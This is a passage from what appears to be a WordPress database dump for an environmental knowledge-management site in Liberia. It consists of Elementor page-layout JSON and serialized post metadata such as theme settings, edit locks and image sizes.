\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19138,2800,'_elementor_version','2.7.5'),(19139,2800,'_elementor_template_type','wp-page'),(19140,2800,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19144,2801,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627660704;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3127;}i:1;a:1:{s:2:\"id\";i:3297;}i:2;a:1:{s:2:\"id\";i:3117;}}}}'),(19145,2801,'_edit_lock','1580996548:38'),(19148,2801,'_elementor_controls_usage','a:0:{}'),(19152,2801,'_edit_last','1'),(19153,2801,'ocean_gallery_link_images','off'),(19154,2801,'ocean_sidebar','0'),(19155,2801,'ocean_second_sidebar','0'),(19156,2801,'ocean_disable_margins','enable'),(19157,2801,'ocean_display_top_bar','default'),(19158,2801,'ocean_display_header','default'),(19159,2801,'ocean_center_header_left_menu','0'),(19160,2801,'ocean_custom_header_template','0'),(19161,2801,'ocean_header_custom_menu','0'),(19162,2801,'ocean_menu_typo_font_family','0'),(19163,2801,'ocean_disable_title','default'),(19164,2801,'ocean_disable_heading','default'),(19165,2801,'ocean_disable_breadcrumbs','default'),(19166,2801,'ocean_display_footer_widgets','default'),(19167,2801,'ocean_display_footer_bottom','default'),(19168,2801,'ocean_custom_footer_template','0'),(19169,2801,'ocean_link_format_target','self'),(19170,2801,'ocean_quote_format_link','post'),(19171,2801,'osh_disable_topbar_sticky','default'),(19172,2801,'osh_disable_header_sticky','default'),(19173,2801,'osh_sticky_header_style','default'),(19174,2804,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629054540;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:3489;}i:2;a:1:{s:2:\"id\";i:3290;}}}}'),(19175,2804,'_edit_lock','1575446666:1'),(19179,2804,'_edit_last','1'),(19180,2804,'ocean_gallery_link_images','off'),(19181,2804,'ocean_sidebar','0'),(19182,2804,'ocean_second_sidebar','0'),(19183,2804,'ocean_disable_margins','enable'),(19184,2804,'ocean_display_top_bar','default'),(19185,2804,'ocean_display_header','default'),(19186,2804,'ocean_center_header_left_menu','0'),(19187,2804,'ocean_custom_header_template','0'),(19188,2804,'ocean_header_custom_menu','0'),(19189,2804,'ocean_menu_typo_font_family','0'),(19190,2804,'ocean_disable_title','default'),(19191,2804,'ocean_disable_heading','default'),(19192,2804,'ocean_disable_breadcrumbs','default'),(19193,2804,'ocean_display_footer_widgets','default'),(19194,2804,'ocean_display_footer_bottom','default'),(19195,2804,'ocean_custom_footer_template','0'),(19196,2804,'ocean_link_format_target','self'),(19197,2804,'ocean_quote_format_link','post'),(19198,2804,'osh_disable_topbar_sticky','default'),(19199,2804,'osh_disable_header_sticky','default'),(19200,2804,'osh_sticky_header_style','default'),(19201,2804,'_elementor_controls_usage','a:0:{}'),(19213,2809,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628210727;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:2804;}i:2;a:1:{s:2:\"id\";i:3489;}}}}'),(19214,2809,'_edit_lock','1574787899:2'),(19215,2810,'_wp_attached_file','2019/11/FDA-MD.jpg'),(19216,2810,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:18:\"2019/11/FDA-MD.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"FDA-MD-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"FDA-MD-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"FDA-MD-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(19217,2809,'_elementor_controls_usage','a:0:{}'),(19220,2809,'_thumbnail_id','2810'),(19221,2809,'_edit_last','2'),(19222,2809,'ocean_gallery_link_images','off'),(19223,2809,'ocean_sidebar','0'),(19224,2809,'ocean_second_sidebar','0'),(19225,2809,'ocean_disable_margins','enable'),(19226,2809,'ocean_display_top_bar','default'),(19227,2809,'ocean_display_header','default'),(19228,2809,'ocean_center_header_left_menu','0'),(19229,2809,'ocean_custom_header_template','0'),(19230,2809,'ocean_header_custom_menu','0'),(19231,2809,'ocean_menu_typo_font_family','0'),(19232,2809,'ocean_disable_title','default'),(19233,2809,'ocean_disable_heading','default'),(19234,2809,'ocean_disable_breadcrumbs','default'),(19235,2809,'ocean_display_footer_widgets','default'),(19236,2809,'ocean_display_footer_bottom','default'),(19237,2809,'ocean_custom_footer_template','0'),(19238,2809,'ocean_link_format_target','self'),(19239,2809,'ocean_quote_format_link','post'),(19240,2809,'osh_disable_topbar_sticky','default'),(19241,2809,'osh_disable_header_sticky','default'),(19242,2809,'osh_sticky_header_style','default'),(19245,2813,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629004401;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3297;}i:1;a:1:{s:2:\"id\";i:3038;}i:2;a:1:{s:2:\"id\";i:3430;}}}}'),(19246,2813,'_edit_lock','1574788371:2'),(19247,2814,'_wp_attached_file','2019/11/Illicit-mining.jpg'),(19248,2814,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:26:\"2019/11/Illicit-mining.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Illicit-mining-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Illicit-mining-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Illicit-mining-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(19249,2813,'_elementor_controls_usage','a:0:{}'),(19252,2813,'_thumbnail_id','2814'),(19253,2813,'_edit_last','2'),(19254,2813,'ocean_gallery_link_images','off'),(19255,2813,'ocean_sidebar','0'),(19256,2813,'ocean_second_sidebar','0'),(19257,2813,'ocean_disable_margins','enable'),(19258,2813,'ocean_display_top_bar','default'),(19259,2813,'ocean_display_header','default'),(19260,2813,'ocean_center_header_left_menu','0'),(19261,2813,'ocean_custom_header_template','0'),(19262,2813,'ocean_header_custom_menu','0'),(19263,2813,'ocean_menu_typo_font_family','0'),(19264,2813,'ocean_disable_title','default'),(19265,2813,'ocean_disable_heading','default'),(19266,2813,'ocean_disable_breadcrumbs','default'),(19267,2813,'ocean_display_footer_widgets','default'),(19268,2813,'ocean_display_footer_bottom','default'),(19269,2813,'ocean_custom_footer_template','0'),(19270,2813,'ocean_link_format_target','self'),(19271,2813,'ocean_quote_format_link','post'),(19272,2813,'osh_disable_topbar_sticky','default'),(19273,2813,'osh_disable_header_sticky','default'),(19274,2813,'osh_sticky_header_style','default'),(19275,82,'osh_disable_topbar_sticky','default'),(19276,82,'osh_disable_header_sticky','default'),(19277,82,'osh_sticky_header_style','default'),(19278,2818,'_elementor_controls_usage','a:0:{}'),(19279,2818,'_ca_post_type','post'),(19280,2817,'_edit_last','1'),(19281,2817,'_elementor_controls_usage','a:0:{}'),(19282,2817,'_ca_handle','0'),(19283,2817,'_ca_host','sidebar'),(19284,2817,'_ca_merge_pos','0'),(19285,2817,'_edit_lock','1574818815:1'),(19286,1745,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627587722;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3109;}i:1;a:1:{s:2:\"id\";i:1772;}i:2;a:1:{s:2:\"id\";i:3104;}}}}'),(19287,2297,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628876151;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1734;}i:1;a:1:{s:2:\"id\";i:1728;}i:2;a:1:{s:2:\"id\";i:1730;}}}}'),(19288,2751,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628876247;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:2165;}i:2;a:1:{s:2:\"id\";i:3263;}}}}'),(19289,2819,'_elementor_edit_mode','builder'),(19290,2819,'_elementor_template_type','wp-page'),(19291,2819,'_elementor_version','2.7.5'),(19292,2819,'_wp_page_template','default'),(19293,2819,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_paralla